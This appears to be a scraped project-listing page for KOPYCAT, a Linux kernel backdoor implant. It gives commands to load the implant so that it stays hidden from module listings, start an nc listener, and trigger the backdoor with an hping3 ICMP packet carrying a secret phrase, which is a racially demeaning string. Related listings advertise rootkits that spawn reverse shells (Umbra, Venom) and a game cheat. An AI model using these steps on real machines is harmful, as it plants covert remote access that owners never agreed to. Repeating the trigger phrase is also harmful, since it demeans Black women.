Linux Kernel module-less implant (backdoor)

Related tags

Utilities kopycat
Overview

0

KOPYCAT - Linux Kernel module-less implant (backdoor)

Usage

$ make
$ sudo insmod kopycat.ko
insmod: ERROR: could not insert module kopycat.ko: Inappropriate ioctl for device
$ lsmod | grep kopycat
$ cat /proc/modules | grep kopycat

Launch nc listener:

$ nc -l 6666

Trigger the backdoor by sending ICMP packet with secret phrase:

$ sudo hping3 -c 1 -j -1 -e black-wives-are-fatter 127.0.0.1

Author

Ilya V. Matveychikov

2021

Owner
Ilya V. Matveychikov
Linux kernel addict, security researcher, reverse engineer
Ilya V. Matveychikov
A LKM rootkit targeting 4.x and 5.x kernel versions which opens a backdoor that can be used to spawn a reverse shell to a remote host and more.

Umbra Umbra (/ˈʌmbrə/) is an experimental LKM rootkit for kernels 4.x and 5.x (up to 5.7) which opens a network backdoor that spawns reverse shells to

Marcos S. Bajo 83 Jul 26, 2022
featured cs:go internal hack, one file and less than 1000 lines.

singlefile This is a featured CS:GO internal cheat written in less than 1000 lines, and in one C++ file. I encourage you to submit feature suggestions

null 47 Jun 29, 2022
An asynchronous directory file change watcher module for Windows, macOS and Linux wrapped for V

A V module for asynchronously watching for file changes in a directory. The module is essentially a wrapper for septag/dmon. It works for Windows, macOS and Linux.

null 16 Jul 29, 2022
Locate the current executable and the current module/library on the file system

Where Am I? A drop-in two files library to locate the current executable and the current module on the file system. Supported platforms: Windows Linux

Gregory Pakosz 366 Aug 7, 2022
Modify Android linker to provide loading module and hook function

fake-linker Chinese document click here Project description Modify Android linker to provide loading module and plt hook features.Please check the det

sanfengAndroid 194 Jul 19, 2022
[WIP] A Riru module tries to enable Magisk hide for isolated processes.

Riru-IsolatedMagiskHider Background Many applications now detect Magisk for security, Magisk provided "Magisk Hide" to prevent detection, but isolated

残页 509 Aug 5, 2022
Documenting the development of a simple first module.

Your First Module This guide will look at writing a complete module, with many common features in a reduced form. This includes the module initialisat

Open Multiplayer 16 Jun 3, 2021
Simple and lightweight pathname parser for C. This module helps to parse dirname, basename, filename and file extension .

Path Module For C File name and extension parsing functionality are removed because it's difficult to distinguish between a hidden dir (ex: .git) and

Prajwal Chapagain 3 Feb 25, 2022
zsh module for automatically compiling sourced files

Zinit Module Motivation The module is a binary Zsh module (think about zmodload Zsh command, it's that topic) which transparently and automatically co

zdharma-continuum 10 Jul 8, 2022
Python module to reduce a cmake file to an AST

CMake AST Status Travis CI (Ubuntu) AppVeyor (Windows) Coverage PyPI Licence cmake-ast has been tested against every single CMake module that ships wi

ポリ平方 POLYSQUARE 27 May 11, 2022
UClamp backports and custom tunings for different kernel versions/devices

Linux kernel ============ This file was moved to Documentation/admin-guide/README.rst Please notice that there are several guides for kernel develop

null 25 Jan 14, 2022
A WIP "Vulnerable by Design" kext for iOS/macOS to play & learn *OS kernel exploitation

Vulnerable Kext A WIP (work-in progress) "Vulnerable by Design" kext for iOS/macOS to play/learn with *OS kernel exploitation Usage Documentation can

Chaithu 218 Jul 16, 2022
This project aims to facilitate debugging a kernel driver in windows by adding support for a code change on the fly without reboot/unload, and more!

BSOD Survivor Tired of always telling yourself when you got a BSOD that what if I could just return to the caller function which caused the BSOD, and

Ido Westler 147 Aug 3, 2022
Windows kernel hacking framework, driver template, hypervisor and API written on C++

Windows kernel hacking framework, driver template, hypervisor and API written on C++

Александр 1.2k Aug 12, 2022
Quick check of NT kernel exported&unexported functions/global variable offset

NT内核导出以及未导出函数-全局变量偏移速查 Quick check of NT kernel exported&unexported functions/global variable offset System目录下有已经完成的偏移 可以在线速查 There are already comple

不想加班劉 65 Jun 12, 2022
A simple Windows kernel rootkit.

Venom RootKit A simple windows rootkit that I have wrote, In order to explore a bit about the world of rootkits and windows kernel in general. The Ven

Amit Schendel 58 Jul 22, 2022
the checkra1n set of tools targeting bare metal, Linux and Windows

Universal toolchain Low-effort cross-compiling for the masses. What's Universal toolchain? It's a collection of sysroots and shell scripts in such a w

null 62 May 27, 2022
Orbit, the Open Runtime Binary Instrumentation Tool, is a standalone C/C++ profiler for Windows and Linux

Orbit, the Open Runtime Binary Instrumentation Tool, is a standalone C/C++ profiler for Windows and Linux. Its main purpose is to help developers visualize the execution flow of a complex application.

Google 2.7k Jul 31, 2022
Atomically exchange two files in Linux

Atomically exchange two files in Linux.

David Pape 9 Aug 4, 2022